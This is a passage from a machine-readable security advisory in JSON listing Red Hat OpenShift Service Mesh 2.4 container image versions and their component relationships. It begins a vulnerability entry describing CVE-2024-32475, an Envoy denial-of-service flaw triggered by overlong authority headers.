"purl": "pkg:oci/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.65.16-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.4.11-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.4.11-2"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.4.11-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.4.11-2"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64 as a component of RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-32475",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2024-04-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2276149"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
